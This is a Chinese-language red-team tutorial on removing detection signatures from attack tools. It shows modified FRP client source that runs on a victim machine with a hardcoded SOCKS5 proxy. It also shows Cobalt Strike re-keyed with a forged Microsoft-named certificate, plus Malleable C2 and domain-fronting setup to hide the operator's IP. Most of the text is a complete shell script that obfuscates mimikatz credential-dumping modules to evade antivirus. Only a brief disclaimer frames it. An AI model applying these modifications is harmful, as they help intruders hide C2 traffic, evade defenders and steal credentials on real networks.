常见工具特征去除

郑重声明：文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，如果您不同意请关闭该页面！任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担！

FRP改造

改造之前

在受害者机器上使用frpc.exe -c frpc_socker.ini连接服务起的时候，会产生一个这种数据校检

流量改造

pkg\msg\msg.go

这几个函数中保存着上面的信息

我在前加个了前缀

而在pkg\util\version\version.go 中定义了版本信息，这里也可以修改一下

改成随便一个版本

结果如下

编译方式

首先执行make会进行一些GitHub的包下载（最好使用代理

接着执行make -f Makefile.cross-compiles进行编译

配置文件改造

全称只需要修改这个文件cmd/frpc/sub/root.go

先修改var位置，添加ip、port、fileContent这三个参数

var (
	cfgFile     string
	showVersion bool

	serverAddr        string
	user              string
	protocol          string
	token             string
	logLevel          string
	logFile           string
	logMaxDays        int
	disableLogColor   bool
	ip                string
	port              string
	fileContent       string
	proxyName         string
	localIp           string
	localPort         int
	remotePort        int
	useEncryption     bool
	useCompression    bool
	customDomains     string
	subDomain         string
	httpUser          string
	httpPwd           string
	locations         string
	hostHeaderRewrite string
	role              string
	sk                string
	multiplexer       string
	serverName        string
	bindAddr          string
	bindPort          int

	kcpDoneCh chan struct{}
)

再修改传参位置

func init() {
	rootCmd.PersistentFlags().StringVarP(&cfgFile, "config", "c", "./frpc.ini", "config file of frpc")
	rootCmd.PersistentFlags().BoolVarP(&showVersion, "version", "v", false, "version of frpc")
	rootCmd.PersistentFlags().StringVarP(&ip, "server_addr", "t", "", "server_addr")
	rootCmd.PersistentFlags().StringVarP(&port, "server_port", "p", "", "server_port")
	kcpDoneCh = make(chan struct{})
}

然后自定义一个函数

func getFileContent(ip string, port string) {
	var content string = `[common]
    server_addr = ` + ip + `
    server_port = ` + port + `
    tls_enable = true
	token = china_nb

	[plugin_socks5]
	type = tcp
	remote_port = 12345
	plugin = socks5
	plugin_user = admin
	plugin_passwd = admin
	use_encryption = true 
	use_compression = true
    `
	fileContent = content
}

修改runClient函数

func runClient(cfgFilePath string,ip string,port string) (err error) {
	var content string
	getFileContent(ip,port)
	//scontent, err = config.GetRenderedConfFromFile(cfgFilePath)
	content, err = fileContent, nil
	if err != nil {
		return
	}

	cfg, err := parseClientCommonCfg(CfgFileTypeIni, content)
	if err != nil {
		return
	}

	pxyCfgs, visitorCfgs, err := config.LoadAllConfFromIni(cfg.User, content, cfg.Start)
	if err != nil {
		return err
	}

	err = startService(cfg, pxyCfgs, visitorCfgs, cfgFilePath)
	return
}

最后runClient()函数下调用我们自定义的函数getFileContent()

var rootCmd = &cobra.Command{
	Use:   "frpc",
	Short: "frpc is the client of frp (https://github.com/fatedier/frp)",
	RunE: func(cmd *cobra.Command, args []string) error {
		if showVersion {
			fmt.Println(version.Full())
			return nil
		}
		// Do not show command usage here.
		err := runClient(cfgFile,ip,port)
		if err != nil {
			fmt.Println(err)
			os.Exit(1)
		}
		return nil
	},
}

成功结果

CobaltStrike改造

修改默认端口

编辑teamserver文件，更改Dcobaltstrike.server_port参数为8090

修改证书特征

查看证书，密码默认的123456

keytool -list -v -keystore cobaltstrike.store

从图中可以看到别名、所有者、发布者都有明显的cobaltstrike特征，所以我们可以把原证书给删了，使用以下命令生成一个新的证书

-alias 指定别名
-storepass 指定更改密钥库的存储口令
‐keypass pass 指定更改条目的密钥口令
-keyalg 指定算法
-dname 指定所有者信息

keytool -keystore cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias Microsoft.com -dname "CN=Microsoft e-Szigno Root CA, OU=e-Szigno CA, O=Microsoft Ltd., L=Budapest, S=HU, C=HU"

流量伪装

通过使用项目来操作Malleable-C2-Profiles

使用方法：./teamserver [external IP] [password] [/path/to/my.profile]

如果我们自己编写插件的话，可以使用.\c2lint [/path/to/my.profile]来验证是否可以使用

可以看到我们使用了插件后流量数据修改了，但是还有一个不足的点这边会显示我们的IP地址

域前置

在上述我们修改了流量特征后发现还是会泄露我们的IP，会给防守队的溯源提供便利，所以我们可以使用CDN进行操作。由于现在的CDN需要验证域名所属了，没办法用像ccc.github.com、ccc.apple.com这种的域名了，所以本文中使用a.test.com作为域名讲解

首先修改我们使用的Malleable-C2-Profiles，把下图的参数都修改为a.test.com这个域名

然后重启Cobaltstrike，在监听器中按下图进行设置

然后再用该监听器生成的木马即可实现域前置

mimikatz改造

替换关键字脚本

#!/bin/sh
git clone --depth=1 https://github.com.cnpmjs.org/gentilkiwi/mimikatz.git mimikatz

## BASIC Strings ##

mimi=$(cat /dev/urandom | tr -dc "a-zA-Z" | fold -w 8 | head -n 1)
mv windows/mimikatz windows/$mimi
find windows/ -type f -print0 | xargs -0 sed -i "s/mimikatz/$mimi/g"
MIMI=$(cat /dev/urandom | tr -dc "A-Z" | fold -w 8 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/MIMIKATZ/$MIMI/g"
Mimi=$(cat /dev/urandom | tr -dc "a-zA-Z" | fold -w 8 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/Mimikatz/$Mimi/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 5 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/DELPY/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 8 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/Benjamin/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 23 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/benjamin@gentilkiwi.com/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 15 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/creativecommons/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 10 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/gentilkiwi/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z" | fold -w 4 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/KIWI/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z" | fold -w 4 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/Kiwi/$string/g"
kiwi=$(cat /dev/urandom | tr -dc "a-zA-Z" | fold -w 4 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/kiwi/$kiwi/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 13 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/A La Vie, A L/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 24 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/vincent.letoux@gmail.com/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 8 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/benjamin/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 14 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/Benjamin DELPY/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 5 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/oe.eo/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 14 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/pingcastle.com/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 16 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/mysmartlogon.com/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 15 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/Vincent LE TOUX/$string/g"

## Basic Function Names ##

find windows/ -type f -print0 | xargs -0 sed -i "s/logonPasswords/loGoNpASSwoRdS/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/dpapi/dPApi/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/sekurlsa/seKuRlSa/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/sekurLSA/seKuRlSa/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/ngc/nGc/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/lsadump/lsADumP/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/crypto/cRyPTO/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/kerberos/kErberoS/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/token/tOKEn/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/misc/mIsC/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/minesweeper/mInesWeEpEr/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/vault/vAULt/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/privilege/PRIViLeGe/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/process/ProCeSs/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/busylight/bUsYlIght/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/sr98/sR98/g"


## Sub-function Names ##

# Sekurlsa #

find windows/ -type f -print0 | xargs -0 sed -i "s/msv/mSv/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/wdigest/wDiGeST/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/tspkg/tsPkG/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/livessp/liVeSsP/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/cloudap/clOuDAp/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/ssp/sSp/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/logonpasswords/loGonPaSSworDs/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/minidump/mIniDumP/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/bootkey/bOOtKey/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/pth/ptH/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/krbtgt/krbTgT/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/backupkeys/backUpKeyS/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/tickets/ticKets/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/ekeys/eKeYs/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/credman/crEdMan/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/tickets/ticKets/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/ekeys/eKeYs/g"

# Crypto #

find windows/ -type f -print0 | xargs -0 sed -i "s/providers/prOviDers/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/certificates/certIfiCatEs/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/scauth/sCaUth/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/extract/exTraCt/g"

# dpapi #

find windows/ -type f -print0 | xargs -0 sed -i "s/masterkey/masTerKeY/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/credhist/crEdHiSt/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/cloudapkd/clOudApKd/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/cloudapreg/clOuDapReg/g"

# kerberos #

find windows/ -type f -print0 | xargs -0 sed -i "s/golden/golDen/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/ptt/pTt/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/clist/cLiSt/g"

# lsadump #

find windows/ -type f -print0 | xargs -0 sed -i "s/secrets/seCrEts/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/sam/saM/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/dcshadow/dCShAdoW/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/dcsync/dCsYnC/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/setntlm/seTnTlM/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/netsync/neTSynC/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/cache/caCHe/g"

# misc #

find windows/ -type f -print0 | xargs -0 sed -i "s/regedit/reGeDit/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/skeleton/sKeLeToN/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/easyntlmchall/easYnTlmChaLl/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/ncroutemon/nCroUTeMoN/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/taskmgr/taSkMgR/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/aadcookie/aAdcOoKiE/g"

# vault #

find windows/ -type f -print0 | xargs -0 sed -i "s/cred/crEd/g"

# token #

find windows/ -type f -print0 | xargs -0 sed -i "s/elevate/eleVatE/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/revert/reVeRt/g"


## Replace file names ##

find windows/ -type f -name "*mimikatz*" | while read FILE ; do
	newfile="$(echo ${FILE} |sed -e "s/mimikatz/$mimi/g")";
	mv "${FILE}" "${newfile}";
done
find windows/ -type f -name "*kiwi*" | while read FILE ; do
	newfile="$(echo ${FILE} |sed -e "s/kiwi/$kiwi/g")";
	mv "${FILE}" "${newfile}";
done
## ZIP File ##

zip -r mimi.zip ./windows

然后把这串字符串给删了，改成hello word

然后利用软件对图标进行提取和替换，替换后如下图

最终样式

参考文章

https://chowdera.com/2021/03/20210311155239092N.html
https://uknowsec.cn/posts/notes/FRP%E6%94%B9%E9%80%A0%E8%AE%A1%E5%88%92.html
https://choge.top/2020/08/16/Cobaltstrike%E4%B9%8B%E6%B5%81%E9%87%8F%E9%9A%90%E8%97%8F/
https://gist.githubusercontent.com/S3cur3Th1sSh1t/08623de0c5cc67d36d4a235cec0f5333/raw/dafbd32d1307c4ebb512e4eb7c43c7e1292bcac9/ObfuscateMimi_First.sh